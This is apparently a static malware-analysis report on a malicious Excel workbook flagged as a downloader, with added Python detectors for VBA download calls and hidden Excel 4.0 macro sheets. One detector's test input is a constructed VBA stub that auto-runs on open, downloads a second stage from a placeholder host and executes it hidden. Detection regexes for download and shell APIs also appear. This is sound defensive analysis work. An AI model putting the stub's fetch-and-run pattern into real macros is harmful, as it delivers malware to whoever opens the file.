Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 65306eb08dd1a434…

MALICIOUS

Office (OLE) / .XLS

Size: 85.5 KB
Created: 2021-04-19 10:40:48
MD5: 5c3a1b785f532a889980751123e3ffce
SHA-1: 7367e0738024c4a20bb6adad20aa4c9ef914d178
SHA-256: 65306eb08dd1a43406d46b1226d62f44db7040442ec9568fd8decfd3405294b3
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer

The file is a legacy-format (OLE/BIFF8) Excel workbook that carries both an Excel 4.0 (XLM) macro sheet and a VBA project. Heuristics fire on both macro types, with critical hits for a URLDownloadToFile reference in the VBA code and for URL-download strings in general. The VBA explicitly uses the urlmon function URLDownloadToFileA, which indicates a downloader built to fetch a second-stage payload from a remote host and execute it. The ClamAV signature Xls.Downloader.Valyria-10002374-0 independently classifies the file as a downloader.
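The pattern the summary describes (a urlmon declare for URLDownloadToFileA, an auto-executing entry point, a second stage written to disk and run) is what a static triage pass looks for in decoded VBA. The script below is an added example, not the report's own analyzer or oletools code: it runs a small rule set over VBA source of the kind olevba writes out and maps the hits to the two ATT&CK techniques listed above. The VBA snippet is constructed to match that pattern and is not the sample's actual macro; the URL and file names in it are placeholders, and the rule names are illustrative.

```python
"""Static triage of decoded VBA source (the kind olevba writes to macros.bas).

Added example, not the report's own analyzer. The VBA below is a constructed
downloader stub in the shape the report describes, not the sample's macro;
URL and file names are placeholders and the rule IDs are illustrative.
"""
import re

# Constructed sample: a urlmon declare (split over continuation lines, as decoded
# VBA often is) plus an auto-exec entry point that fetches and runs a second stage.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As LongPtr, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Auto_Open()
    Dim dst As String
    dst = Environ("TEMP") & "\stage2.exe"
    If URLDownloadToFileA(0, "http://example.invalid/stage2.exe", dst, 0, 0) = 0 Then
        Shell dst, vbHide
    End If
End Sub
'''

# (rule id, severity, ATT&CK technique or None, compiled regex)
RULES = [
    ("OLE_VBA_DOWNLOAD", "critical", "T1105",
     re.compile(r"\bURLDownloadToFile[AW]?\b", re.I)),
    ("VBA_AUTOEXEC", "medium", "T1059.005",
     re.compile(r"\bSub\s+(Auto_Open|Workbook_Open|AutoOpen|Document_Open)\b", re.I)),
    ("VBA_SHELL_EXEC", "high", "T1059.005",
     re.compile(r"\b(Shell|WScript\.Shell|CreateObject)\b", re.I)),
    ("VBA_API_DECLARE", "low", None,
     re.compile(r"\bDeclare\b.*\bLib\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"'()]+", re.I)
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def normalize(src: str) -> str:
    """Join VBA line continuations (' _' + newline) so a Declare that is split
    across several lines is matched as one statement."""
    return re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src)


def triage_vba(src: str) -> dict:
    """Run the rules over decoded VBA; return rule hits, ATT&CK mapping, URLs and a verdict."""
    text = normalize(src)
    hits, techniques = [], set()
    for rule_id, severity, technique, rx in RULES:
        if rx.search(text):
            hits.append((rule_id, severity))
            if technique:
                techniques.add(technique)
    urls = sorted(set(URL_RE.findall(text)))   # download URLs are the first IOCs to pivot on
    worst = max((SEVERITY_RANK[s] for _, s in hits), default=0)
    verdict = ("malicious" if worst >= SEVERITY_RANK["critical"]
               else "suspicious" if worst else "clean")
    return {
        "rules": sorted(r for r, _ in hits),
        "techniques": sorted(techniques),
        "urls": urls,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The continuation join matters in practice: a `Declare ... Lib "urlmon"` wrapped across three lines will not match a single-line regex otherwise, which is one of the simplest ways a macro evades naive string scanning. Real samples also build the API name or URL from concatenated fragments; those need a deobfuscation pass before this kind of matching is trustworthy.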

Heuristics 5

  • Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]
    URLDownloadToFile in VBA
  • ClamAV: Xls.Downloader.Valyria-10002374-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Downloader.Valyria-10002374-0
  • Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected [medium, OLE_VBA_MACROS]
    Document contains VBA macro code
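What the XLM heuristic actually checks is structural: in a BIFF8 Workbook stream each sheet is announced by a BOUNDSHEET record whose type byte distinguishes worksheets from Excel 4.0 macro sheets, and the sheet an Auto_Open defined name (a NAME record) points at is where execution starts when the workbook opens. The code below is an added example, not the report's analyzer or oletools code, that walks those records, reports macro sheets, very-hidden macro sheets and Auto_Open targets. The record layouts follow MS-XLS (BOUNDSHEET 0x0085, NAME/Lbl 0x0018); the Workbook stream is constructed inline so it runs offline, and the rule names it emits are illustrative.

```python
"""Locate Excel 4.0 macro sheets and Auto_Open names in a BIFF8 Workbook stream.

Added example, not the report's analyzer. Record layouts follow MS-XLS
(BOUNDSHEET 0x0085, NAME/Lbl 0x0018). The streams below are constructed
so the code runs offline; rule names are illustrative.
"""
import struct

BOUNDSHEET, NAME, BOF, EOF = 0x0085, 0x0018, 0x0809, 0x000A
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro", 0x02: "chart", 0x06: "vba_module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "very hidden"}
BUILTIN_NAMES = {0x00: "Consolidate_Area", 0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}


def record(rec_id, body):
    return struct.pack("<HH", rec_id, len(body)) + body


def boundsheet(name, sheet_type, visibility):
    # BoundSheet8: lbPlyPos(4) hsState(1) dt(1), then ShortXLUnicodeString cch(1) fHighByte(1) rgb
    raw = name.encode("latin-1")
    return record(BOUNDSHEET, struct.pack("<IBBBB", 0, visibility, sheet_type, len(raw), 0) + raw)


def defined_name(name, itab, builtin=False):
    # Lbl: grbit(2) chKey(1) cch(1) cce(2) res(2) itab(2) res(4) fHighByte(1) rgb; cce=0 (no formula)
    raw = bytes([name]) if builtin else name.encode("latin-1")
    head = struct.pack("<HBBHHHBBBB", 0x0020 if builtin else 0, 0, len(raw), 0, 0, itab, 0, 0, 0, 0)
    return record(NAME, head + b"\x00" + raw)


# Constructed streams: a visible worksheet plus a very-hidden XLM macro sheet that a
# built-in Auto_Open name (itab is 1-based) points at, and a benign one-sheet workbook.
BOF_BODY = struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0)
SAMPLE_STREAM = (record(BOF, BOF_BODY) + boundsheet("Sheet1", 0x00, 0)
                 + boundsheet("Macro1", 0x01, 2) + defined_name(0x01, 2, builtin=True)
                 + record(EOF, b""))
BENIGN_STREAM = record(BOF, BOF_BODY) + boundsheet("Sheet1", 0x00, 0) + record(EOF, b"")


def iter_records(stream):
    off = 0
    while off + 4 <= len(stream):
        rec_id, length = struct.unpack_from("<HH", stream, off)
        yield rec_id, stream[off + 4: off + 4 + length]
        off += 4 + length


def _xlstring(data, off, cch, high_byte):
    n = cch * 2 if high_byte & 1 else cch
    return data[off:off + n].decode("utf-16-le" if high_byte & 1 else "latin-1")


def parse_workbook(stream):
    sheets, names = [], []
    for rec_id, body in iter_records(stream):
        if rec_id == BOUNDSHEET:
            _, hs, dt, cch, high = struct.unpack_from("<IBBBB", body, 0)
            sheets.append({"name": _xlstring(body, 8, cch, high),
                           "type": SHEET_TYPES.get(dt, hex(dt)),
                           "visibility": VISIBILITY.get(hs, hex(hs))})
        elif rec_id == NAME:
            grbit = struct.unpack_from("<H", body, 0)[0]
            itab = struct.unpack_from("<H", body, 8)[0]
            if grbit & 0x0020:   # fBuiltin: the name is a one-byte code, not text
                name = BUILTIN_NAMES.get(body[15], "builtin_%02x" % body[15])
            else:
                name = _xlstring(body, 15, body[3], body[14])
            names.append({"name": name, "itab": itab, "hidden": bool(grbit & 0x0001)})
    return sheets, names


def xlm_findings(stream):
    """Rule hits in the spirit of the heuristics above: macro sheet present,
    very-hidden macro sheet, and each Auto_Open name resolved to its sheet."""
    sheets, names = parse_workbook(stream)
    hits = []
    macro = [s for s in sheets if s["type"] == "macro"]
    if macro:
        hits.append("OLE_XLM_MACROSHEET")
    if any(s["visibility"] == "very hidden" for s in macro):
        hits.append("XLM_VERY_HIDDEN")
    for n in names:
        if n["name"].lower().startswith("auto_open"):
            target = sheets[n["itab"] - 1]["name"] if 0 < n["itab"] <= len(sheets) else "<global>"
            hits.append("OLE_XLM_AUTOOPEN:" + target)
    return hits


if __name__ == "__main__":
    print(xlm_findings(SAMPLE_STREAM))
    print(xlm_findings(BENIGN_STREAM))   # prints []
```

On a real .xls the stream comes from the OLE container (for instance `olefile.OleFileIO(path).openstream("Workbook").read()`), which is an assumption about tooling outside this block. Two caveats a practitioner should keep in mind: a "very hidden" state (2) can only be set through the object model or by editing the file, so a very-hidden macro sheet is a stronger signal than a merely hidden one; and Excel will also honour a plain-text name such as `Auto_Open1`, which is why the check uses a prefix match rather than equality.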

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename        SHA-256                                                           Kind        Source                                                   Size
xlm_macros.txt  41be2b5c82d9e14d9be1fbaeffee5a79c9b77b94caf7ea9a5931c5a76fa1b8bb  xlm-macro   oletools.olevba.extract_all_macros (XLM macro listing)   680 bytes
macros.bas      293339812c0c0c3d0b55b744e81dc1c23ef156896a7f87a30a25a4b72d076b59  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      2870 bytes